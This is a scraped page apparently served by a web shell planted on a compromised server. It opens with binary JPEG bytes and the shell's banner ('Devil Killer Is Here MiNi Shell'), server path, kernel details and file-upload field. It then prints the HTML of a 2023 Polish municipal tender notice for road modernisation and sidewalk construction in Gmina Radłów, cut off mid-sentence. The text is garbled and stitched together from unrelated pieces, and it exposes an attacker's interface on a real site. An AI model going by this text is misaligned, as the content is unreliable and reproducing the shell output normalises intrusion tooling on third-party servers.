JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230124/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230124/0005555601-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Budowa chodnika w miejscowości Wola Radłowska oraz modernizacja dróg na terenie Gminy Radłów” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Radłów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 851660915</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kolejowa 7</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Radłów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">33-130</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL217 - Tarnowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@gminaradlow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.gminaradlow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Budowa chodnika w miejscowości Wola Radłowska oraz modernizacja dróg na terenie Gminy Radłów” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-26e9d91e-9c11-11ed-94da-6ae0fe5e7159</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00055556</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-01-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00035174/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 &#34;Budowa chodnika w Wola Radłowska oraz modernizacja dróg na terenie Gminy Radłów.&#34;</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-26e9d91e-9c11-11ed-94da-6ae0fe5e7159 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Zamawiającym a Wykonawcami, w tym składanie ofert oraz przekazywanie dokumentów lub oświadczeń, odbywa się przy użyciu środków komunikacji elektronicznej na platformie: https://ezamowienia.gov.pl/pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Maksymalny rozmiar plików przesłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików przesłanych jako załączniki do jednego formularza).<br/>- Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>- W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu (32)77 88 999 lub drogą elektroniczną poprzez formularz udostępniony na stronie internetowej https://ezamowienia.gov.pl/pl/ z zakładce „Zgłoś problem”.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający oświadcza, że spełnia wymogi określone w rozporządzeniu Parlamentu Europejskiego i Rady (UE) 2016/679 z 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 4 maja 2016 r.), dalej: RODO, tym samym dane osobowe podane przez wykonawcę będą przetwarzane zgodnie z RODO oraz zgodnie z przepisami krajowymi.<br/>b) Dane osobowe wykonawcy będą przetwarzane na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego pn. „Budowa pełnowymiarowej hali sportowej w Radłowie”.Odbiorcami przekazanych przez wykonawcę danych osobowych będą osoby lub podmioty, którym zostanie udostępniona dokumentacja postępowania zgodnie z art. 8 oraz art. 96 ust. 3 ustawy Pzp, a także art. 6 ustawy z 6 września 2001 r. o dostępie do informacji publicznej.<br/>d) Dane osobowe wykonawcy zawarte w protokole postępowania będą przechowywane przez okres 4 lat, od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy.<br/>e) Klauzula informacyjna, o której mowa w art. 13 ust. 1 i 2 RODO znajduje się Informacji nt. RODO - załącznik nr 9 do SWZ.Zamawiający nie planuje przetwarzania danych osobowych wykonawcy w celu innym niż cel określony w lit. b powyżej. Jeżeli administrator będzie planował przetwarzać dane osobowe w celu innym niż cel, w którym dane osobowe zostały zebrane (tj. cel określony w lit. b powyżej), przed takim dalszym przetwarzaniem poinformuje on osobę, której dane dotyczą, o tym innym celu oraz udzieli jej wszelkich innych stosownych informacji, o których mowa w art. 13 ust. 2 RODO.<br/>g) Wykonawca jest zobowiązany, w związku z udziałem w przedmiotowym postępowaniu, do wypełnienia wszystkich obowiązków formalno-prawnych wymaganych przez RODO i związanych z udziałem w przedmiotowym postępowaniu o udzielenie zamówienia. Do obowiązków tych należą:<br/>- obowiązek informacyjny przewidziany w art. 13 RODO względem osób fizycznych, których dane osobowe dotyczą i od których dane te wykonawca bezpośrednio pozyskał i przekazał zamawiającemu w treści oferty lub dokumentów składanych na żądanie zamawiającego;<br/>- obowiązek informacyjny wynikający z art. 14 RODO względem osób fizycznych, których dane wykonawca pozyskał w sposób pośredni, a które to dane wykonawca przekazuje zamawiającemu w treści oferty lub dokumentów składanych na żądanie zamawiającego.<br/>h) W celu zapewnienia, że wykonawca wypełnił ww. obowiązki informacyjne oraz ochrony prawnie uzasadnionych interesów osoby trzeciej, której dane zostały przekazane w związku z udziałem w postępowaniu, wykonawca składa oświadczenia o wypełnieniu przez niego obowiązków informacyjnych przewidzianych w art. 13 lub art. 14 RODO – treść oświadczenia została zawarta w załączniku nr 9 do SWZ. i) Sposób postępowania z danymi osobowymi, w tym ich udostępnianie itd. opisany został w SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PPI.271.3.23</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1)Część 1 pn. „Modernizacja dróg w miejscowościach Radłów, Biskupice <br/>Radłowskie, Zdrochec, Glów, Sanoka, Marcinkowice, Zabawa, Niwka i Wola <br/>Radłowska” <br/>Lp. Nazwa zadania Lokalizacja Długość km <br/>1. Modernizacja drogi gminnej nr <br/>K200156 Biskupice Radłowskie -<br/>Jasna dz. nr 827 w m. Biskupice <br/>Radłowskie w km 0+000 - 0+322<br/>Biskupice Radłowskie 0,322<br/>2. Modernizacja drogi gminnej ul. <br/>Polna na dz. nr 1851 w m. <br/>Radłów km 0+000 - 0+154<br/>Radłów 0,154<br/>3. Modernizacja drogi gminnej ul. <br/>Polna dz. nr 1873/5, 1873/6, <br/>1873/7, 1873/8 w m. Radłów km <br/>0+000 - 0+133<br/>Radłów 0,133<br/>4. Modernizacja drogi gminnej nr <br/>200115K Zabawa - Podwale dz . <br/>nr 65/3 w m. Zabawa w km <br/>0+850 - 1+125<br/>Zabawa 0,275<br/>5. Modernizacja drogi gminnej dz. <br/>nr 968 w m. Zabawa km 0+000 -<br/>0+120<br/>Zabawa 0,120<br/>6. Modernizacja drogi gminnej dz. <br/>nr 1348 w m. Zabawa km 0+000 <br/>-0+200<br/>Zabawa 0,200<br/>7. Modernizacja drogi gminnej nr <br/>200196 K Sanoka Przez Wieś <br/>dz. nr 48/2 w m. Sanoka w km <br/>0+440 -1+078<br/>Sanoka, Glów 0,638<br/>8. Modernizacja drogi gminnej dz. <br/>nr 150/3, 150/4, 150/5 w m. <br/>Niwka w km 0+335 - 0+962<br/>Niwka 0,627<br/>9. Modernizacja drogi gminnej nr <br/>200142K Błonie dz nr 756 w m. <br/>Wola Radłowska 0,174<br/>Wola Radłowska w km 0+546 -<br/>0+720<br/>10. Modernizacja drogi gminnej nr <br/>200144K Pańska droga dz. nr <br/>1206/2 w m. Wola Radłowska <br/>w km 0+000 -0+575<br/>Wola Radłowska 0,575<br/>11. Modernizacja drogi gminnej dz <br/>nr 1924/2 w m. Wola Radłowska <br/>w km 0+000 -0+202<br/>Wola Radłowska 0,202<br/>12. Modernizacja drogi gminnej nr <br/>200128K Marcinkowice -<br/>Przybysławice w m. <br/>Marcinkowice dz nr 1156 w km <br/>0+000-0+517<br/>Marcinkowice Przybysławice<br/>0,517<br/>13. Modernizacja drogi gminnej nr <br/>200196K Sanoka Przez Wieś dz. <br/>nr 6/1 oraz drogi gminnej dz. nr <br/>6/1 w m. Sanoka km 0+000-<br/>0+428<br/>Sanoka 0,428<br/>14. Modernizacja drogi gminnej nr <br/>200121K Zabawa -Do Zdrochca <br/>dz nr 1117 w m. Zabawa i dz nr <br/>508 w m. Zdrochec w km 0+180 <br/>- 0+703 oraz km 0+975 - 1+317<br/>Zabawa -Zdrochec 0,865<br/>15. Modernizacja drogi gminnej dz. <br/>nr 1325/9 w m. Radłów km <br/>0+000-0+231<br/>Radłów 0,231<br/>16. Remont drogi w ramach <br/>modernizacji drogi gminnej nr <br/>200194K Glów dz. nr 117/1<br/>119/1<br/>116/1<br/>119/2 w km 0+600 - 1+100 oraz <br/>1+500 - 2+000<br/>Glów 1,000<br/>Łącznie: 6,461 km <br/>a) Przedmiot zamówienia obejmuje realizację następującego zakresu robót: <br/> wyrównanie istniejącej nawierzchni mieszanką bitumiczną<br/> wykonanie warstwy ścieralnej – 4 cm,<br/> miejscowe wzmocnienie podbudowy,<br/> regulacja krawędzi jezdni,<br/> utwardzenie poboczy dróg kruszywem wraz z powierzchniowym utrwaleniem,<br/>b) Szczegółowy opis i zakres przedmiotu zamówienia określają: <br/> Dokumentacja Projektowa – Załącznik nr 6.1 do SWZ. <br/> STWiORB – Załącznik nr 5.1 do SWZ,  Przedmiar robót (będący częścią Dokumentacji projektowej) – Załącznik <br/>nr 4.1 do SWZ. <br/> Projektowane postanowienia umowy – Załącznik nr 7 do SWZ.<br/>W projektowanych postanowieniach umownych przyjęto zasadę wynagrodzenia <br/>ryczałtowego, tak więc wchodzący w skład Dokumentacji projektowej Przedmiarrobót ma również na celu umożliwienie dokonania wyceny poszczególnych <br/>elementów robót. <br/>2) Zamawiający oczekuje od Wykonawcy podania ceny za realizację zamówienia, <br/>jako ceny ryczałtowej, która obejmuje wykonanie wszystkich elementów <br/>zamówienia będących przedmiotem rysunku i tekstu załączników do SWZ, łącznie <br/>z podatkiem VAT obowiązującym w dniu złożenia oferty. <br/>3) Zamawiający żąda przed podpisaniem umowy z wybranym Wykonawcą, <br/>złożenia przez niego uproszczonego Kosztorysu ofertowego, sporządzonego w <br/>oparciu o Dokumentację Projektową, STWiORB oraz ewentualną wizję <br/>lokalną przeprowadzoną przez Wykonawcę. <br/>4) Wykonawca wykona roboty budowlane w oparciu o dokumentację projektową, <br/>zgodnie z warunkami wykonania i odbioru robót określonymi w STWiORB, <br/>z należytą starannością, zgodnie z aktualnie obowiązującymi przepisami, normami <br/>technicznymi, standardami, zasadami sztuki budowlanej, etyką zawodową oraz <br/>warunkami określonymi w dokumentach zamówienia.<br/>5) Do wykonania robót Wykonawca użyje wyłącznie materiałów własnych, <br/>posiadających wymagane atesty i certyfikaty, które będą wymagane przy odbiorze <br/>końcowym robót. Przy doborze materiałów należy kierować się wymaganiami <br/>sprecyzowanymi w dokumentacji technicznej oraz specyfikacji technicznej <br/>wykonania i odbioru robót. <br/>6) W czasie realizacji robót Wykonawca będzie usuwał i składował wszelkie <br/>urządzenia pomocnicze we własnym zakresie i na własny koszt.<br/>7) Wszelkie inne koszty realizacji przedmiotu zamówienia (koszty mediów – energia <br/>elektryczna, woda, opłaty, i inne), konieczne do poniesienia w celu prawidłowego <br/>wykonania zamówienia, do momentu jego bezusterkowego, protokolarnego <br/>przyjęcia przez Zamawiającego poniesie Wykonawca. <br/>8) Wykonawca zapewni do kierowania robotami osoby z uprawnieniami <br/>w specjalnościach niezbędnych do prawidłowego wykonania powierzonego <br/>zadania, w szczególności w specjalności drogowej i będzie w okresie realizacji <br/>prowadził dziennik budowy (jeżeli takowy będzie konieczny) we współpracy z <br/>Inspektorem Nadzoru ustanowionym przez Zamawiającego.<br/>9) Należy zachować szczególną ostrożność i zminimalizować uciążliwości związane <br/>z prowadzonymi pracami gdyż Wykonawca ponosił będzie pełną <br/>odpowiedzialność za szkody oraz następstwa nieszczęśliwych wypadków <br/>pracowników i osób trzecich, a powstałych w związku z prowadzonymi robotami <br/>budowlanymi w okresie od daty protokolarnego przejęcia terenu budowy przez <br/>Wykonawcę do daty końcowego odbioru robót, <br/>10) Wykonawca jest odpowiedzialny za staranne zapoznanie się z dokumentami <br/>zamówienia.<br/>11) Wszystkie wymagania określone w dokumentach zamówienia stanowią <br/>wymagania minimalne i ich spełnienie jest obligatoryjne. Niespełnienie ww. <br/>wymagań minimalnych będzie skutkować odrzuceniem oferty jako niezgodnej <br/>z warunkami zamówienia na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp.<br/>12) Gwarancja i rękojmia<br/>a) Wymagany okres gwarancji na wykonany przedmiot umowy – minimum 36 <br/>miesięcy. <br/>b) Wymagany okres rękojmi na wykonany przedmiot umowy – minimum 36 <br/>miesięcy. Ostateczny termin gwarancji jakości oraz rękojmi zostanie określony w ofercie <br/>Wykonawcy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233142-6 - Roboty w zakresie naprawy dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty w częściach od 1 do 3 zamawiający będzie <br/>kierował się następującymi kryteriami i odpowiadającymi im znaczeniami oraz <br/>w następujący sposób będzie oceniał spełnienie kryteriów:<br/>Lp. Opis kryterium oceny Znaczenie (%)<br/>1. Cena 60 punktów<br/>2. Okres gwarancji jakości 40 punktów<br/>Razem 100 punktów<br/>2)Sposób dokonywania oceny:<br/>a) Sposób oceny ofert w kryterium cena:<br/>Pc = (Cbn /Cb) x 60 punktów<br/>Gdzie: Pc - liczba punktów<br/>Cbn - najniższa ze wszystkich ofert cena ofertowa brutto;<br/>Cb - proponowana w danej ofercie cena ofertowa brutto.<br/>b) Sposób oceny ofert w kryterium okres gwarancji jakości (Pg):<br/> Zaoferowanie 36 miesięcy gwarancji – 0 pkt. Zaoferowanie 42 miesięcy gwarancji – 10 pkt. <br/> Zaoferowanie 48 miesięcy gwarancji – 20 pkt. <br/> Zaoferowanie 54 miesięcy gwarancji – 30 pkt. <br/> Zaoferowanie 60 miesięcy gwarancji – 40 pkt. <br/>Zamawiający informuje, iż za najdłuższy realny okres gwarancji jakości przyjmuje okres <br/>60miesięcy. <br/>Minimalny natomiastwymagany przez Zamawiającego okres gwarancji wynosi 36 miesięcy. <br/>c) Całkowita „Liczba punktów”, zostanie obliczona w następujący sposób:<br/>Lp = Pc + Pg, gdzie:<br/>Lp - całkowita liczba punktów uzyskanych przez ofertę<br/>Pc - liczba punktów uzyskanych w kryterium cena <br/>Pg - liczba punktów uzyskanych w kryterium okres gwarancji.<br/>3) Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku.<br/>4) Punktacja przyznawana ofertom w poszczególnych kryteriach będzie liczona <br/>z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy <br/>najkorzystniejszą ofertę</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2 pn. „Budowa chodnika w ciągu drogi powiatowej nr 1419 K relacji <br/>Jadowniki Mokre – Wał Ruda- Radłów w miejscowości Wola Radłowska, w km <br/>10+242,00 – 10+724,00 na długości 482mb – Etap III oraz modernizacja drogi o <br/>nawierzchni z kostki brukowej w miejscowości Radłów”<br/>a) Przedmiot zamówienia obejmuje realizację następującego zakresu robót:<br/> Roboty pomiarowe, obsługa geodezyjna <br/> Odwodnienie – wody opadowe po stronie prawej z jezdni i chodnika zostaną zebrane <br/>do ścieku przykrawężnikowego wykonanego z kostki betonowej, następnie spłyną do <br/>wpustów ulicznych posadowionych na studzienkach wodno-ściekowych z osadnikiem <br/>i poprzez przykanaliki zostaną wprowadzone do studni rewizyjnych wybudowanych <br/>na kanale. <br/> Zjazdy - Po wykonanym korytowaniu wykonać podbudowę pomocniczą z kruszywa <br/>łamanego grubości 30 cm następnie podbudowę zasadniczą z mieszanki kruszywa <br/>łamanego grubości 20 cm. Po wykonaniu podsypki cementowo-piaskowej grubości 3 <br/>cm ułożyć nawierzchnię zjazdu z kostki betonowej wibroprasowanej czerwonej <br/>grubości 8 cm. <br/> Krawężniki i obrzeża - Na wykonanej ławie betonowej z oporem ułożyć obrzeża <br/>wibroprasowane 8*30 oraz krawężniki 15*30 a na wjazdach krawężniki najazdowe i <br/>skośne. <br/> Chodnik - Po wykonanym korytowaniu wykonać podbudowę pomocniczą z kruszywa <br/>łamanego grubości 20 cm następnie podbudowę zasadniczą z mieszanki kruszywa <br/>łamanego grubości 15 cm. Po wykonaniu podsypki cementowo-piaskowej grubości 3 <br/>cm ułożyć nawierzchnię chodnika z kostki betonowej wibroprasowanej szarej <br/>grubości 6 cm. <br/> Poszerzenie jezdni - Wykonać koryto pod poszerzenie jezdni i pod ściek <br/>przykrawężnikowy. Wykonać podbudowę pomocniczą z mieszanki kruszywa <br/>łamanego grubości 30 cm, następnie podbudowę zasadniczą z mieszanki kruszywa <br/>łamanego grubości 26 cm, warstwę wiążącą AC16W grubości 5 cm, warstwę ścieralna <br/>AC11S grubości 4 cm ułożyć również na sfrezowanej części istniejącej 